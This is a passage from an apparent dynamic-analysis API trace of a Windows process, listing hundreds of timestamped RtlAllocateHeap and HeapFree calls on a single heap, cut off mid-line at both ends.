0x231ef70 [0175.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2332180 [0175.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f0) returned 0x4b8b10 [0175.830] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0175.830] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2345390 [0175.830] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23585a0 [0175.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x236b7b0 [0175.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x237e9c0 [0175.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2391bd0 [0175.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23a4de0 [0175.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23b7ff0 [0175.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23cb200 [0175.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23de410 [0175.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x23f1620 [0175.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2404830 [0175.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2417a40 [0175.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x242ac50 [0175.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x243de60 [0175.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2451070 [0175.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2464280 [0175.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2477490 [0175.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x248a6a0 [0175.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x249d8b0 [0175.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24b0ac0 [0175.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24c3cd0 [0175.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24d6ee0 [0175.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24ea0f0 [0175.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x24fd300 [0175.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2510510 [0175.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2523720 [0175.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2536930 [0175.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2549b40 [0175.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x255cd50 [0175.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x256ff60 [0175.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2583170 [0176.034] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x468) returned 0x4cc5f0 [0176.034] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8b10 | out: hHeap=0x4a0000) returned 1 [0176.034] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2596380 [0176.035] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25a9590 [0176.036] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25bc7a0 [0176.036] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25cf9b0 [0176.037] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25e2bc0 [0176.037] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2600080 [0176.040] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2613290 [0176.040] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26264a0 [0176.041] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26396b0 [0176.042] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x264c8c0 [0176.042] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x265fad0 [0176.043] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2672ce0 [0176.043] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2685ef0 [0176.043] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2699100 [0176.044] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26ac310 [0176.044] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26bf520 [0176.045] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26d2730 [0176.045] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26e5940 [0176.046] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26f8b50 [0176.046] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x270bd60 [0176.047] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x271ef70 [0176.047] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2732180 [0176.048] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2745390 [0176.050] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27585a0 [0176.051] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x276b7b0 [0176.051] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x277e9c0 [0176.051] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2791bd0 [0176.051] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27a4de0 [0176.052] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27b7ff0 [0176.052] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27cb200 [0176.053] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27de410 [0176.053] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27f1620 [0176.054] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2804830 [0176.055] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2817a40 [0176.055] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x282ac50 [0176.056] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x283de60 [0176.056] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2851070 [0176.056] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2864280 [0176.057] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2877490 [0176.057] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x288a6a0 [0176.058] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x289d8b0 [0176.058] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28b0ac0 [0176.059] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28c3cd0 [0176.059] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28d6ee0 [0176.059] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28ea0f0 [0176.060] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28fd300 [0176.060] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2910510 [0176.061] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x698) returned 0x4b8910 [0176.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cc5f0 | out: hHeap=0x4a0000) returned 1 [0176.061] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2923720 [0176.061] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2936930 [0176.062] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2949b40 [0176.062] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x295cd50 [0176.062] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x296ff60 [0176.063] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2983170 [0176.063] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2996380 [0176.064] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29a9590 [0176.064] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29bc7a0 [0176.064] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29cf9b0 [0176.065] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29e2bc0 [0176.065] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29f5dd0 [0176.066] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a08fe0 [0176.066] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a1c1f0 [0176.066] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a2f400 [0176.067] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a42610 [0176.067] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a55820 [0176.068] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a68a30 [0176.068] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a7bc40 [0176.069] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a8ee50 [0176.069] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2aa2060 [0176.069] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ab5270 [0176.070] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ac8480 [0176.222] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2adb690 [0176.223] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2aee8a0 [0176.223] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b01ab0 [0176.223] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b14cc0 [0176.224] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b27ed0 [0176.224] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b3b0e0 [0176.225] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b4e2f0 [0176.225] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b61500 [0176.226] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b74710 [0176.226] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b87920 [0176.226] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b9ab30 [0176.227] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2badd40 [0176.227] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bc0f50 [0176.227] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bd4160 [0176.228] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2be7370 [0176.228] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bfa580 [0176.228] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c0d790 [0176.229] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c209a0 [0176.229] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c33bb0 [0176.230] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c46dc0 [0176.230] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c59fd0 [0176.230] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c6d1e0 [0176.231] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c803f0 [0176.231] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c93600 [0176.231] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ca6810 [0176.231] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cb9a20 [0176.231] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cccc30 [0176.232] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cdfe40 [0176.232] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cf3050 [0176.232] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d06260 [0176.233] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d19470 [0176.233] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d2c680 [0176.233] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d3f890 [0176.234] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d52aa0 [0176.234] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d65cb0 [0176.235] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d78ec0 [0176.235] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d8c0d0 [0176.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d9f2e0 [0176.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2db24f0 [0176.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2dc5700 [0176.237] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2dd8910 [0176.237] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e00080 [0176.238] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e13290 [0176.238] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e264a0 [0176.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e396b0 [0176.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e4c8c0 [0176.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e5fad0 [0176.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9e0) returned 0x4cc5f0 [0176.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0176.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e72ce0 [0176.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e85ef0 [0176.241] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e99100 [0176.241] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2eac310 [0176.241] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ebf520 [0176.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ed2730 [0176.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ee5940 [0176.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ef8b50 [0176.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f0bd60 [0176.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f1ef70 [0176.244] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f32180 [0176.244] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f45390 [0176.244] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f585a0 [0176.245] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f6b7b0 [0176.245] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f7e9c0 [0176.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cc5f0 | out: hHeap=0x4a0000) returned 1 [0183.578] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d7480 | out: hHeap=0x4a0000) returned 1 [0183.578] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f7280 | out: hHeap=0x4a0000) returned 1 [0183.578] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50a490 | out: hHeap=0x4a0000) returned 1 [0183.578] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51d6a0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5308b0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x543ac0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x556cd0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x569ee0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x57d0f0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1e80080 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1e93290 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ea64a0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1eb96b0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ecc8c0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1edfad0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ef2ce0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f05ef0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f19100 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f2c310 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f3f520 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f52730 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2000080 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2013290 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20264a0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20396b0 | out: hHeap=0x4a0000) returned 1 [0183.579] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x204c8c0 | out: hHeap=0x4a0000) returned 1 [0183.786] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x205fad0 | out: hHeap=0x4a0000) returned 1 [0183.787] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2072ce0 | out: hHeap=0x4a0000) returned 1 [0183.787] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2085ef0 | out: hHeap=0x4a0000) returned 1 [0183.787] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2099100 | out: hHeap=0x4a0000) returned 1 [0183.787] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20ac310 | out: hHeap=0x4a0000) returned 1 [0183.787] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20bf520 | out: hHeap=0x4a0000) returned 1 [0183.788] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20d2730 | out: hHeap=0x4a0000) returned 1 [0183.788] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20e5940 | out: hHeap=0x4a0000) returned 1 [0183.788] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20f8b50 | out: hHeap=0x4a0000) returned 1 [0183.792] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x210bd60 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x211ef70 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2132180 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2145390 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21585a0 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x216b7b0 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x217e9c0 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2191bd0 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21a4de0 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21b7ff0 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21cb200 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21de410 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2200080 | out: hHeap=0x4a0000) returned 1 [0183.793] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2213290 | out: hHeap=0x4a0000) returned 1 [0183.799] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22264a0 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22396b0 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x224c8c0 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x225fad0 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2272ce0 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2285ef0 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2299100 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22ac310 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22bf520 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22d2730 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22e5940 | out: hHeap=0x4a0000) returned 1 [0183.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22f8b50 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x230bd60 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x231ef70 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2332180 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2345390 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23585a0 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x236b7b0 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x237e9c0 | out: hHeap=0x4a0000) returned 1 [0183.805] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2391bd0 | out: hHeap=0x4a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23a4de0 | out: hHeap=0x4a0000) returned 1 [0183.806] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23b7ff0 | out: hHeap=0x4a0000) returned 1 [0183.810] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23cb200 | out: hHeap=0x4a0000) returned 1 [0183.812] HeapFree (in: hHeap=0x4a0000, 